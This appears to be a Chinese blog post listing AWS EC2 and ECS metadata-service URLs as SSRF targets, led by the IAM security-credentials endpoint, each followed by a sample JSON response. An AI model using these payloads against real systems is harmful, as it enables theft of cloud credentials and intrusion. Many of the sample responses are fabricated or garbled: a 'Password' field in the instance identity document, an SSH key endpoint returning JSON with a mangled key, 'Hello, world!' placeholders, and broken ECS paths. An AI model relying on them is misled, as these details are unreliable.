【Web】云安全之SSRF可利用的敏感API列表

以下是一些比较敏感的 AWS 元数据服务 API 列表(持续更新):

  1. 获取 EC2 实例的 IAM 角色凭证:

    http://169.254.169.254/latest/meta-data/iam/security-credentials/
    ````
    
    其中 `` 是要获取 IAM 角色凭证的角色名称。
    或者
    http://169.254.169.254/latest/meta-data/iam/security-credentials/
    
    返回json举例
    {
      "Code" : "Success",
      "LastUpdated" : "2020-01-01T00:00:00Z",
      "Type" : "AWS-HMAC",
      "AccessKeyId" : "AKIAIOSFODNN7EXAMPLE",
      "SecretAccessKey" : "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY",
      "Token" : "AQoEXAMPLEH4aoAH0gNCAPyJxz4BlCFFxWNE1OPTgk5TthT+FvwqnKwRcOIfrRh3c/LTo6UDdyJwOOvEVPvL1v8pSX7mJH60zdBDF5W0qlainiVob9t8C1o+Uk/VItyBabExample",
      "Expiration" : "2020-01-01T01:00:00Z"
    }
  2. 获取 EC2 实例的密码数据:

    http://169.254.169.254/latest/meta-data/instance-identity/document
    
    返回json举例
    {
      "metaData": {  
        "self": {  
          "href": "https://ec2.amazonaws.com/"  
        },  
        "Password": "password"  
      }  
    }
    
  3. 获取 EC2 实例的 SSH 公钥:

    http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
    返回json示例
    {
      "message": "Hello, world!",  
      "data": {  
        "url": "http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key",  
        "key": {  
          "algorithm": "openssh",  
          "size": 2048,  
          "public": true,  
          "private": true,  
          "raw": "d 壹 l4@N+|-sbnW1Ew=="  
        }  
      }  
    }
    
    
  4. 获取 ECS 容器实例的任务定义:

    http://169.254.170.2/v2/metadata//task-definition
    返回json示例包
    {
      "message": "Hello, world!",    
      "data": {    
        "taskDefinition": {    
          "type": "AWS::EC2::TaskDefinition",    
          "Properties": {    
            "Description": "Test Task Definition",    
            "ImageId": "ami-12345678",    
            "Name": "test-task-definition",    
            "Tags": [    
              {    
                "Key": "Environment",    
                "Value": "Test"    
              }    
            ]    
          }    
        },    
        "url": "http://169.254.170.2/v2/metadata/container-id/task-definition"    
      }    
    }
    
    

    其中  是要获取任务定义的容器 ID。

  5. 获取 ECS 容器实例的任务元数据:

    http://169.254.170.2/v2/metadata//task-with-metadata
    返回json包示例
    {
      "message": "Hello, world!",      
      "data": {      
        "taskWithMetadata": {      
          "type": "AWS::EC2::TaskWithMetadata",      
          "Properties": {      
            "ImageId": "ami-12345678",      
            "Name": "test-task-with-metadata",      
            "TaskDefinition": {      
              "type": "AWS::EC2::TaskDefinition",      
              "Properties": {      
                "Description": "Test Task Definition",      
                "ImageId": "ami-12345678",      
                "Name": "test-task-definition",      
                "Tags": [      
                  {      
                    "Key": "Environment",      
                    "Value": "Test"      
                  }      
                ]      
              }      
            },      
            "Tags": [      
              {      
                "Key": "Environment",      
                "Value": "Test"      
              }      
            ]      
          }      
        },      
        "url": "http://169.254.170.2/v2/metadata/container-id/task-with-metadata"      
      }      
    }
    

    其中  是要获取任务元数据的容器 ID。

你可能感兴趣的:(WEB_安全,云安全,云安全,元数据服务,web安全)